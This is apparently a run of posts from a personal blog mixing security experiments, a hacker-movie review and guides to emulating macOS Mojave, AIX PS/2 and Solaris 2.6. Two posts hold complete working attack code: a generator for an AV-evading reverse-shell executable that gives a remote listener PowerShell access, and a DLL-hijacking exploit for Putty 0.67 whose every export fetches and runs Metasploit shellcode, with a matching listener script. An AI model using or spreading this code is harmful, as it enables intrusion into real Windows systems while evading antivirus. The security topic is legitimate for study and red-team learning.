I have been following their work for a while and in my opinion they are one of the best in terms of offensive/defensive work on the PowerShell side of Windows cyber-security.

Their latest toolkit GhostPack is most of their work rewritten from Powershell scripts to C# and you can read all about it here on their official release statement https://posts.specterops.io/ghostpack-d835018c5fc4

What I have tested was

Compilation worked fine on Windows 7 Sp1 x86_64 via Visual Studio 2013 for the following

  SharpDump
  SharpRoast
  SharpUp
  SharpWMI

Only the following needed Visual Studio 2015 (which I ran on Windows 10 x86_64)

  Seatbelt

The compilation is straight forward, as taken from their Github instructions

Seatbelt has been built against .NET 3.5 
and is compatible with Visual Studio 2015 Community Edition. 
Simply open up the project .sln, choose "release", and build.

Next I have loaded Windows 10 x86_64 with fully updated Defender and the latest patches for the build of Windows 10 17134.165

I have prepared a custom Meterpreter loader and a listener and tried to execute all the compiled GhostPack binaries from the meterpreter shell directly through memory via the following

meterpreter > execute -H -i -c -f /home/user/metasploit-framework/Seatbelt.exe -m -d calc.exe

However this did not work for any of the executables (apart from the SafetyKatz.exe which I did not even try to load this way, since it dumps files on c:/tmp to work with the minidump) Instead I have just uploaded them and executed them via a shell command from meterpreter

Finally I have prepared a video demonstration of the tests here

Another one from the collection of the WTF moments … maybe this one is slightly better then the others. A great German movie from the 2014 https://www.imdb.com/title/tt3042408/  That I have just watched recently/

From this movie one can remember this word – NIEMAND

Niemand is synonymous with keiner (“no one”), which is the nominalised masculine form of the pronoun kein (“no”). In written German, niemand is more common than keiner, whereas colloquial German often prefers the latter. (Note that keiner can also be used in other senses, in which niemand is not applicable.)

This movie is also laced by Ritalin, as one can glimpse throughout the movie … something the low-class hippies of the 70’s enjoyed a lot (read – poor man’s speed)

I have made some screenshots from the film that I wanted to comment (from the technical ascpect)  So lets start

First glimpse of the console and Nmap pops in .. I guess this is a classic now and a great introduction to all the wonderful NSE scripts (its already mentioned in the hall of fame https://nmap.org/movies/)

Next comes some wild exploit attempt to shut down the German power provider to show a point

In next hax0r scene we see is Benjamin sabotaging the local Nazi convention’s main speakers laptop and hooking it up to a rogue AP … some wild console-fu there …

Next we jump into some 1337 bufferoverlow.sh shell pr0n on top of the Berlin rooftops

while injecting a custom mp4 to the major German morning business news channel

And leaving a rather rude message to all the poor Business people out there …

Next there is an attack on some big German Pharma .. involves in hacking the main HQ building lights and displaying a message like we simulate with BlinkenLights .. hey this was done in Berlin right ? by the CCC already no ? :)

We are 1337 …

And while we are at it we can win us some nice German Porshe in a Phone contest….

But when we party with the girlz … well things don’t turn out so well …

MRX master hax0r from the Darknet does not care what we did…. so we do something to impress him … we hack BND …um … by phising its employees …

With nice LOL Catz  “Can I haz some Cheesburger plz ? ”

So we hack the shit out of BDN once in …

And target the main BND print server and alter the print jobs there ….

Who the hell is this MRX anyway  … so we go on IRC again … lets find out

He lets us talk to him ! All hail the master .

But lets destroy all the HDD with some Acid now … remember Viktor from Brutal Nikita ?

So we prepare a 1337 double trojan and feed it to MRX on IRC

He does not bite … Bitchez ! Looks at me ! Well we end our command line pr0n here … it was actually a nice movie and I have enjoyed it a lot …

Is this where the authors of Mr. Robot got the original idea from ? heh ?

Updated 04.08.2018 – Fixed the missing xz command in the script

Apple has released a public beta for their latest OS codename Mojave – macOS 10.14. If you posses a relatively new Mac then you can easily download, install and use it. There are a couple of changes that I have noticed (and learned the hard way) in Mojave. Namely the APFS enforcement on the drive you install Mojave to. Even if you initially format the drive with  Mac OS Extended , in second stage install the disk gets magically converted to APFS.

This is where I got stuck for a while, since the VirtualBox EFI shell did not know how to even see the APFS formatted drive in order to boot from it. I have came across an excellent project from Alexander Willner – Run macOS 10.14 Mojave on VirtualBox on macOS  ( https://github.com/AlexanderWillner/runMacOSinVirtualBox) and even though this is strictly Mac only, it provided me enough clues to replicate his approach and successfully install Mojave on VirtualBox running on Linux.

So here are my steps that I have done

1. Creating and obtaining the Mojave ISO yourself if you do not trust the copies on the Internet (I did not upload mine since it is about 10 Gigabytes)

If you already have macOS High Sierra installed in your VirtualBox then you can dive in,                    !!!!!! MAKE SURE YOU HAVE ENOUGH DISK SPACE ON YOUR MAC !!!!!                  about 50 Gigabytes shoud be fine, otherwise please follow my previous articles ( https://astr0baby.wordpress.com/2018/07/15/installing-high-sierra-10-13-6-in-virtualbox-5-2-12-on-linux-x86_64/)

Once inside the macOS, make sure you have your AppleID ready, if not create one (takes about 10 minutes). Next open Safari and point it to

https://beta.apple.com/sp/betaprogram/redemption#macos

Login with your AppleID and install the macOS Public Beta Access Utility

Once its installed, you can move next to download the Mojave image

The download can take some time, be patient and remember once its finished DO NOT INSTALL IT !  Just exit the Mojave installer.

Next I have carved out some portions from Alexander’s  excellent script  here https://github.com/AlexanderWillner/runMacOSinVirtualBox/blob/master/runMojaveVirtualbox.sh

First one is to prepare the Mojave ISO – called image.sh

#!/bin/sh
readonly INST_VERS="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' | wc -l | tr -d '[:space:]')"
readonly INST_VER="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' -print -quit)"
readonly INST_BIN="$INST_VER/Contents/Resources/createinstallmedia"
readonly DST_DIR="/tmp"
readonly VM="macOS-Mojave"
readonly VM_DIR="$HOME/VirtualBox VMs/$VM"
readonly DST_DMG="$DST_DIR/$VM.dmg"
readonly DST_CLOVER="$DST_DIR/${VM}Clover"
readonly DST_VOL="/Volumes/$VM"
readonly DST_ISO="$DST_DIR/$VM.iso.cdr"

ejectAll() {
hdiutil info | grep 'Install macOS' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'OS X Base System' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'InstallESD' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil detach "$DST_VOL" 2>/dev/null || true
}

version="$(/usr/libexec/PlistBuddy -c 'Print CFBundleShortVersionString' "$INST_VER/Contents/Info.plist")"
echo "Creating image '$DST_DMG' (be patient, version $version, will need sudo)..." 
ejectAll
hdiutil create -o "$DST_DMG" -size 10g -layout SPUD -fs HFS+J &&
hdiutil attach "$DST_DMG" -mountpoint "$DST_VOL" &&
sudo "$INST_BIN" --nointeraction --volume "$DST_VOL"
ejectAll
hdiutil convert "$DST_DMG" -format UDTO -o "$DST_ISO"

After this script finishes (takes some time) you should have the ISO file ready in /tmp on your virtualized macOS. We can delete the macOS-Mojave.dmg now but keep the macOS-Mojave.iso.cdr

Move the file somewhere since we will be transferring  it to our Linux host.

Please note we are using xz  in the next script to uncompress the clover image tarball! To get xz  on a macOS first install brew like so

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

brew install xz 

Next we run a second script that will prepare the Clover boot ISO and inject apfs.efi driver. Script is called clover.sh

#!/bin/bash
readonly INST_VER="$(find /Applications -maxdepth 1 -type d -name 'Install macOS*' -print -quit)"
curl -Lk https://raw.githubusercontent.com/AlexanderWillner/runMacOSinVirtualBox/master/config.plist
ejectAll() {
hdiutil info | grep 'Install macOS' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'OS X Base System' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil info | grep 'InstallESD' | awk '{print $1}' | while read -r i; do
hdiutil detach "$i" 2>/dev/null || true
done
hdiutil detach "$DST_VOL" 2>/dev/null || true
}

ejectAll
hdiutil attach "$INST_VER/Contents/SharedSupport/BaseSystem.dmg" &&
cp /Volumes/OS\ X\ Base\ System/usr/standalone/i386/apfs.efi "./apfs.efi"
ejectAll

curl -Lk https://sourceforge.net/projects/cloverefiboot/files/Bootable_ISO/CloverISO-4533.tar.lzma/download -o clover.tar.lzma
sleep 1
xz -d clover.tar.lzma
tar xf clover.tar
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/ 2>/dev/null || true
hdiutil attach Clover-v2.4k-4533-X64.iso
hdiutil create -megabytes 16 -fs MS-DOS -volname MojaveClover -o ./clover.dmg
hdiutil detach /Volumes/NO\ NAME/ 2>/dev/null || true
hdiutil attach ./clover.dmg
cp -r /Volumes/Clover-v2.4k-4533-X64/* /Volumes/NO\ NAME/
cp ./config.plist /Volumes/NO\ NAME/EFI/CLOVER/
cp ./apfs.efi /Volumes/NO\ NAME/EFI/CLOVER/drivers64UEFI/
hdiutil detach /Volumes/Clover-v2.4k-4533-X64/
hdiutil detach /Volumes/NO\ NAME/
hdiutil makehybrid -iso -joliet -o ./clover.iso ./clover.dmg

So now we should have clover.iso in our working directory and this should be moved to some location where we put the previous macOS-Mojave.iso.cdr   For your convenience I have uploaded the clover.iso for Mojave here https://drop.me/MRqW76

So next we transfer the files to our Linux (scp, samba, which ever way you prefer, I personally setup Samba server on my Linux and upload via SMB from VMs)

2. Setting up VirtualBox for Mojave

Next we will start preparing our VirtualBox environment. I have configured mine like so:

For networking I use the following setup

And this network script that I run on my Linux host (This is my config, your environment will be probably different, but feel free to experiment)

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

After you create the environment, before you boot the Mojave installer run the following script – assuming you named your VM “Mojave” so change the variable $NAME accordingly

#!/bin/bash
readonly VM_RES="1680x1050"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Next we boot the Mojave installed (we have copied the Mojave and Clover ISOs right ? )

Once you get to the Disk Utility, erase the new VirtualBox drive with APFS and let it install. After a few minutes it will reboot, now shut down the VM and remove the macOS-Mojave.iso.cdr from the CD drive and replace it  with clover.iso

Once we boot the Clover.iso the mouse does not work, no worries the keyboard still does, so you can move the arrow keys to the following

The installation will follow, this time it will take much longer, about 20 – 30 minutes on SSD drive for me.

When the installer exits and goes for reboot the systems gets stuck, just power off the VM and boot as follows (still keep the clover.iso)

Now you should be all set to configure your new Mojave in VirtualBox on Linux !

Again big thanks for to Alexander Willner for his concept ! https://github.com/AlexanderWillner

Short post here,

Having read a really nice article about avoiding modern AVs (again and again) by @ParanoidNinja here https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/  I have decided to add my 0.1 % of code to his to make it a little easier to use on x86_64 Linux (Mint 19)

You will need to have the mingw64 environment installed properly, I have the following packages installed

ii binutils-mingw-w64-i686 2.30-7ubuntu1+8ubuntu1 amd64 Cross-binutils for Win32 (x86) using MinGW-w64
ii binutils-mingw-w64-x86-64 2.30-7ubuntu1+8ubuntu1 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64 7.3.0-11ubuntu1+20.2build1 all GNU C++ compiler for MinGW-w64
ii g++-mingw-w64-i686 7.3.0-11ubuntu1+20.2build1 amd64 GNU C++ compiler for MinGW-w64 targeting Win32
ii g++-mingw-w64-x86-64 7.3.0-11ubuntu1+20.2build1 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64 7.3.0-11ubuntu1+20.2build1 all GNU C compiler for MinGW-w64
ii gcc-mingw-w64-base 7.3.0-11ubuntu1+20.2build1 amd64 GNU Compiler Collection for MinGW-w64 (base package)
ii gcc-mingw-w64-i686 7.3.0-11ubuntu1+20.2build1 amd64 GNU C compiler for MinGW-w64 targeting Win32
ii gcc-mingw-w64-x86-64 7.3.0-11ubuntu1+20.2build1 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64 5.0.3-1 all Development environment targeting 32- and 64-bit Windows
ii mingw-w64-common 5.0.3-1 all Common files for Mingw-w64
ii mingw-w64-i686-dev 5.0.3-1 all Development files for MinGW-w64 targeting Win32
ii mingw-w64-tools 5.0.3-1 amd64 Development tools for 32- and 64-bit Windows
ii mingw-w64-x86-64-dev 5.0.3-1 all Development files for MinGW-w64 targeting Win64

Next we are gonna use the following binary code generator script that will produce our Win32PE executable payload that shall be used on Windows 10 protected by Avast AV

#!/bin/bash
clear
echo "**************************************************************************************"
echo " Automatic C++ source code generator/compiler "
echo " 99.9% code by Paranoid Ninja "
echo " 0.1% code by Astr0 Baby " 
echo " PE32+ executable (GUI) x86-64 "
echo "**************************************************************************************"

echo -en 'Listener server IP : ' 
read ip
echo -en 'Listener port number : ' 
read port

cat <<EOF > final.cpp
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
while(true) {
Sleep(5000); // 1000 = One Second

SOCKET mySocket;
sockaddr_in addr;
WSADATA version;
WSAStartup(MAKEWORD(2,2), &version);
mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
addr.sin_family = AF_INET;

addr.sin_addr.s_addr = inet_addr(C2Server); //IP received from main function
addr.sin_port = htons(C2Port); //Port received from main function

//Connecting to Proxy/ProxyIP/C2Host
if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char RecvData[DEFAULT_BUFLEN];
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char Process[] = "powershell.exe";
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
WaitForSingleObject(pinfo.hProcess, INFINITE);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);

memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
if (strcmp(RecvData, "exit\n") == 0) {
exit(0);
}
}
}
}
}

int main(int argc, char **argv) {
FreeConsole();
if (argc == 3) {
int port = atoi(argv[2]); //Converting port in Char datatype to Integer format
RunShell(argv[1], port);
}
else {
char host[] = "IPGOESHERE";
int port = PORTGOESHERE;
RunShell(host, port);
}
return 0;
}
EOF
sed -i -e "s/IPGOESHERE/$ip/g" final.cpp 
sed -i -e "s/PORTGOESHERE/$port/g" final.cpp

echo "[-] Compiling code .."
x86_64-w64-mingw32-g++ final.cpp -o file.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

if [ $? -eq 0 ]; then
echo "[*] Done ! " 
ls -la file.exe 
else
echo "[-] Failed, please check if you have proper mingw32-g++ installed " 
fi
echo "[-] Now start a local nc listener like this nc -lnvp $port"

You can run the whole execution here

Thanks @NinjaParanoid!

It is vital to understand how these vulnerabilities in fact work (DLL Hijacking from valid Windows PE32 executables) So we will prepare a real world scenario and will use an outdated piece of software for this demonstration and run it on a fully patched Windows 10 x86_64 with up2date Windows Defender.

• Windows 10 x86_64 –  August 30, 2018—KB4346783 (OS Build 17134.254)
• Windows Defender – Definitions 1.275.948.0 (September 8 2018)
• Putty 32 bit 0.67 – Vulnerable to CVE-2016-6167 ( Downloadable here https://www.chiark.greenend.org.uk/~sgtatham/putty/releases/0.67.html)
• Metasploit Framework (metasploit v5.0.0-dev-741bbefae8) running on Linux Mint 19
• Linux x86_64 (I run Mint 19)
• dos2unix converter
• Mingw32 properly installed on Linux x86_64

Also for the analysis of the DLL vulnerabilities we will need the following tools to be executed on Windows 10

• Sysinternals suite (especially the Procmon.exe)  (https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)
• Dll Export Viewer from Nirsoft (http://www.nirsoft.net/utils/dll_export_viewer.html)

So once we have all this lets download Putty 0.67 32bit, procmon.exe and dllexp to the Windows 10 environment (I run it inside a VirtualBox guest)

Lets first prepare some filter rules for procmon.exe as the output gets to be a little heavy and we are only interested in the putty.exe process anyway.  So here is the vulnerable output from the procmon

What we get is a list of Dlls that are obviously being looked for in a wrong place, in this case the user’s dekstop (which is in fact the Dll hijacking scenario now) So imagine we could place a specially crafted dll in this place and re-run vulnerable putty.exe. It would load the Dll right ? Well its not that easy, because Dll need to have a valid entry point (function) called prior execution. So when putty.exe looks for one of the shared libraries it needs, it will call a function from within and use it. So for our exploit to work we will need to know the name of the entry point as well.

Lets find out all the entry points from the valid Dlls that are listed above. We will use the Nirsoft tool called dllxp. We will use the TextInputFramework.dll as an example. Lets load it in dllxp as follows:

And once opened copy paste the Entry point list to a text file that we shall save under the same Dll name for convenience (txt extension) ((which would be later fed to a custom metasploit script)

So now we have a list of all Entry Points, but which one is the right one to spoof with the Dll exploit ? We need to transfer this text file back to our attacker machine from which we will prepare and compile our Dll to be used in the attack. First of all convert the DOS endlines to UNIX format via dos2unix command and place the text file with the entry points to a location from which you will be executing the next script

I have written a following script that helps in this case. What it does it produces a meterpreter reverse loader function call with each of the above entry points, this kinda brute-forcing the vulnerable Dll function when putty.exe calls it.  Below is the code that I have placed inside my meteasploit root directory (does not have to be there of course)

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Dll-EntryPoint Generator astr0 " 
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number (Choose something over TCP 1000) : '
read port
echo -en "File with dll-entries from dllexp binary (make sure you did fromdos on it) /path/to/file :"
read file
echo -en "DLL filename : " 
rm -f final-temp.c temp.c custom-temp.c 
read dllfilename

rm -f custom-temp.c
rm -f temp.c

# Add any DLL overrides here (functions that do not compile)
# Temporary fix for the TextInputFramework.dll errors 
sed -i '/DllCanUnloadNow/d' $file 
sed -i '/DllGetClassObject/d' $file

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("bad\n"); '>> temp.c
echo ' WSACleanup(); '>> temp.c
echo ' exit(1);'>> temp.c
echo ' }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("r %s\n", error);'>> temp.c
echo ' closesocket(my_socket);'>> temp.c
echo ' WSACleanup();'>> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;'>> temp.c
echo ' int nret = 0;'>>temp.c
echo ' void * startb = buffer;'>> temp.c
echo ' while (tret < len) {'>>temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo ' startb += nret;'>> temp.c
echo ' tret += nret;'>>temp.c
echo ' if (nret == SOCKET_ERROR)'>> temp.c
echo ' punt(my_socket, "no data");'>> temp.c
echo ' }'>>temp.c
echo ' return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c
echo ' punt(my_socket, ".");'>>temp.c
echo ' target = gethostbyname(targetip);'>>temp.c
echo ' if (target == NULL)'>>temp.c
echo ' punt(my_socket, "..");'>>temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo ' sock.sin_family = AF_INET;'>> temp.c
echo ' sock.sin_port = htons(port);'>>temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo ' punt(my_socket, "...");'>>temp.c
echo ' return my_socket;'>>temp.c
echo ' }'>> temp.c

for i in `cat $file` ; do 
echo -n 'int ' >> custom-temp.c 
echo -n $i >> custom-temp.c
echo '(int argc, char * argv[]) {' >> custom-temp.c
echo ' FreeConsole();'>> custom-temp.c
echo ' ULONG32 size;'>> custom-temp.c
echo ' char * buffer;'>> custom-temp.c
echo ' void (*function)();'>> custom-temp.c
echo ' winsock_init();'>> custom-temp.c
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>> custom-temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>> custom-temp.c
echo ' if (count != 4 || size <= 0)'>> custom-temp.c
echo ' punt(my_socket, "error lenght\n");'>> custom-temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>> custom-temp.c
echo ' if (buffer == NULL)'>> custom-temp.c
echo ' punt(my_socket, "error in buf\n");'>> custom-temp.c
echo ' buffer[0] = 0xBF;'>> custom-temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);'>> custom-temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);'>> custom-temp.c
echo ' function = (void (*)())buffer;'>> custom-temp.c
echo ' function();'>> custom-temp.c
echo ' return 0;'>> custom-temp.c
echo '}' >> custom-temp.c
done;

cat temp.c custom-temp.c > final-temp.c

echo 'Compiling C code to Dll ..'
#x86_64-w64-mingw32-gcc final-temp.c -o payload.dll -lws2_32 -shared
i686-w64-mingw32-gcc-7.3-win32 final-temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
echo 'Renaming to' $dllfilename
mv payload.dll $dllfilename 
ls -la $dllfilename

The script will produce a Dll filename which needs to have the same name as the one we are going to spoof. In our case we call it TextInputFramework.dll

Next is a simple Listener script for the Metasploit framework to make things easier (place it in the metasploit-framework root dir)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " Metasploit custom listener for DLL exploit "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port

echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh

echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh

# Set the runtime options for autorun 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

So now we should have everything ready for the attack demonstration. Load the above listener and upload the TextInputFramework.dll to the Win10 environment and place it in a directory where the vulnerable Putty.exe is. Then just execute Putty.exe and a meterpreter shell should pop up on your attacker box. Pretty neat hey ? We have bypassed the latest MS AV as well.

Video demonstration below

Enjoy

IBM AIX has been around many years , actually its 32 years now. The latest version is AIX 7.2 and runs only on IBM ppc64 architecture. However around the end of the 1980s  a special port of AIX came out called AIX PS/2 or AIX386.

This short article will be about running this archaic version ( AIX PS/2 1.3) inside VirtualBox 5.2.16 (will work on all older releases too) on Linux x86_64 (will work on macOS and Windows too as long as you get VirtualBox running)

There is some information available still on the internet about AIX PS/2 1.3 for example here :

• http://ohlandl.ipv7.net/AIX_1-3/AIX_1-3_Installation.html
• https://sites.google.com/site/rhdisk0/unix/aix/aixps2
• http://ps-2.kev009.com/aixps2/InstallImages/

The last link contains all the needed floppy images (19 minimum) to get the base install done. Setup is lengthy and tricky (after-all this system is from early 90s and if you don’t get all the things right; very frustrating) So if you want to give it a try yourself, go ahead, its tons of fun. I will spare you the pain and time and provide the needed 2 boot floppy images and the VMDK image for your convenience

Download the AIX-1.3.tar.bz2 here https://drop.me/BlxnAD

Once you download the compressed tarball, decompress and extract and place in some working directory for VirtualBox files. Please note that AIX-1.3.vmdk is identical to aix.vmdk. Its there only as a backup in case we mess up.

user@panasonic ~/Downloads/AIX $ ls -la
total 32680
drwxr-xr-x  2 user user     4096 Sep 14 21:43 .
drwxr-xr-x 18 user user     4096 Sep 14 21:43 ..
-rw-rw-r--  1 user user 33453495 Sep 14 21:43 AIX-1.3.tar.bz2
user@panasonic ~/Downloads/AIX $ bunzip2 AIX-1.3.tar.bz2 
user@panasonic ~/Downloads/AIX $ tar -xvf AIX-1.3.tar 
AIX-1.3/
AIX-1.3/floppy02.img
AIX-1.3/floppy01.img
AIX-1.3/AIX-1.3.vmdk
AIX-1.3/aix.vmdk
user@panasonic ~/Downloads/AIX $

We will prepare a new VirtualBox Guest called AIX and configure with the custom drive (aix.vmdk) as PS/2 other target with 32 MB RAM as follws:

Choose floppy1.img as your boot-disk and boot the Guest

Choose Boot from Diskette (the aix.vmdk does not have MBR so you will always need to use the 2 floppies to boot it)

Select unix.gen (default) module to load, System mode: Multi User (press space to choose) and Run system from hard disk : Yes (press space to choose it)

You will be asked to insert 2nd boot disk, so swap to floppy2.img and press enter.

Now you can login as root, the password is password.

As noted by Supratim Sanyal you can even run a graphical X11 environment by typing

# xinit

And later once in the X11 environment you can execute xdt (IBM Graphical Desktop)

Here is a short video of the above

Also here are some test runs on booting AIX 7.1 and 7.2 in Qemu 3.0.50 on x86_64

And

Next chapter in our Computer Archeology articles. This time it will be about emulating the legendary Sun Solaris 2.6 that dates back to July 1997 and which included Kerberos 5, PAM, TrueType fonts, WebNFS, large file support and enhanced procfs. It was also known as SunOS 5.6

Qemu can emulate many CPU architectures, we will be concerned only with Sparc (qemu-system-sparc). I usually build qemu from source ( https://github.com/qemu/qemu.git ) so with this exercise Im using the below qemu version compiled on Linux Mint 19 :

QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)
Copyright (c) 2003-2017 Fabrice Bellard and the QEMU Project developers

The compilation is pretty straightforward and takes some time if we decide to compile all the emulation platforms supported by Qemu.

Also what I found very handy is the Linux build for RealVNC viewer from here ( https://www.realvnc.com/en/connect/download/viewer/ ) and use it as a VNCviewer with Qemu since the SDL support seems flaky sometimes and breaks some character display in Solaris 2.6 in Qemu.

Next we need to get our hands on the Installer CD ISO for Sun Solaris 2.6 and the ss5.bin (SUN Station 5 PROM )  I have uploaded the gzipped tarball of the ISO and the bin here

https://drop.me/omV3jb

Once we download the archive we extract it to a working directory where we will hold our Solaris 2.6 environment

user@panasonic ~/SOLARIS $ gunzip sol26.tar.gz 
user@panasonic ~/SOLARIS $ tar -xvf sol26.tar 
Sun-Solaris-2.6-sparc/
Sun-Solaris-2.6-sparc/solaris-2.6-sparc.iso
Sun-Solaris-2.6-sparc/ss5.bin
user@panasonic ~/SOLARIS $ cd Sun-Solaris-2.6-sparc/
user@panasonic ~/SOLARIS/Sun-Solaris-2.6-sparc $ ls -la
total 552868
drwxr-xr-x 2 user user 4096 Sep 21 10:51 .
drwxr-xr-x 3 user user 4096 Sep 21 23:52 ..
-rw-r--r-- 1 user user 565862400 Sep 21 10:51 solaris-2.6-sparc.iso
-rw-r--r-- 1 user user 262144 Sep 21 10:51 ss5.bin

So we end up with 2 files in Sun-Solaris-2.6-sparc directory (Installation ISO and PROM image) Next we will create a QCOW image for the HDD and setup some networking per-requisites. Following will create a  36GB QCOW image v3

$ qemu-img create -f qcow2 disk.img 36G
Formatting 'disk.img', fmt=qcow2 size=38654705664 cluster_size=65536 lazy_refcounts=off refcount_bits=16
$ file disk.img 
disk.img: QEMU QCOW Image (v3), 38654705664 bytes

Next we will configure the networking and the /etc/qemu-ifup script.  Networking script can be saved in the emulation directory and needs to be executed with root privileges prior running qemu (you should adjust to your needs here -> enp0s25 is eth0 and wlp9s0 is wlan0 )  lets call this network.sh

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
